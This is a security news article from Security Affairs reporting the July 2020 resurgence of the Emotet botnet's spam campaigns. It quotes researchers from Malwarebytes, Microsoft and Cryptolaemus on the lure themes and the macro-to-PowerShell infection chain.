Emotet botnet surges back after months of absence

After months of inactivity, the infamous Emotet trojan has surged back with a new massive spam campaign targeting users worldwide.

The notorious Emotet went into the dark since February 2020, but now has surged back with a new massive spam campaign targeting users worldwide.

The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542.

In 2019, security experts haven’t detected any activity associated with Emotet since early April, when researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Emotet re-appeared on the threat landscape in August 2019, with an active spam distribution campaign. At the time, Malwarebytes observed the Trojan started pumping out spam, spam messages initially targeted users in Germany, Poland and Italy, and also the US. The campaign continues targeting users in Austria, Switzerland, Spain, the United Kingdom, and the United States.

Emotet is considered by security experts as one of the most active botnet of 2019,

“Today, Emotet suddenly surged back to life with reply-chain, shipping, payment, and invoice spam that deliver malicious Word documents spreadsheets.” states BleepingComputer.

#Emotet AAR for 2020/07/17- Well played Ivan, I dont usually do a Friday report but I did one just for you <3. Actually surprised there were not more changes today in this campaign but it was a lot of the same. I did get some malspam here but it was all filtered. TNW and Be safe! https://t.co/bQvxIwNBpP— Joseph Roosen (@JRoosen) July 18, 2020

Malware researchers Joseph Roosen confirmed that limited activity associate with the botnet was observed earlier this week, botnet operators were using weaponized documents employing old URLs.

Roosen added that the Emotet botnet is now spewing forth massive amounts of spam employing new URLs pointing to compromised WordPress sites.

According to researchers from Confense Labs, most of the recent spam messages are using email with a subject of ‘Jobs GO,’ and a few of them are using a ”Expedia Payment Remittance Advice”  or requests for W-9 templates.

Other samples analyzed by the researchers use bait documents that pose as a shipping document from Loomis-express.com.

Researchers from Cryptolaemus, a group of experts focused on analyzing Emotet, also confirmed Emotet’s resurrection. Other research groups also observed a surge back of the botnet:

Looks like Emotet is back in town https://t.co/fkDITyH9GT https://t.co/7DgiwZQlJN— abuse.ch (@abuse_ch) July 17, 2020
Emotet resurfaced in a massive campaign today after being quiet for several months. The new campaign sports longtime Emotet tactics: emails carrying links or documents w/ highly obfuscated malicious macros that run a PowerShell script to download the payload from 5 download links pic.twitter.com/FZJqDCJQGV— Microsoft Security Intelligence (@MsftSecIntel) July 17, 2020
#Emotet spinning up their buisness. New spam modules being pushed and new spamwaves coming in from both Epoch 2 and 3. Either attached a doc or a mallink. Current Emotet tier-1 C&C geolocation attached. pic.twitter.com/vUTuf9v0GM— peterkruse (@peterkruse) July 17, 2020Researchers from MalwareBytes also published a post containing details of the Emotet activity recently observed.

“It was never a question of “if” but “when”. After five months of absence, the dreaded Emotet has returned. Following several false alarms over the last few weeks, a spam campaign was first spotted on July 13 showing signs of a likely comeback.” reads the post published by MalwareBytes.

“The Emotet botnets started pushing malspam actively on Friday, July 17, using the same techniques as it employed previously. Malicious emails contain either a URL or an attachment.”

Upon enabling the macro, WMI launches PowerShell to retrieve the bot binary from one of the remote compromised websites.

The news that Emotet is back is alarming for security experts, the operators behind the threat used their botnet to deliver also other threats, for this reason, it is very important to share any info related to recent attacks to prevent them from targeting organizations worldwide.

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, botnet)

The post Emotet botnet surges back after months of absence appeared first on Security Affairs.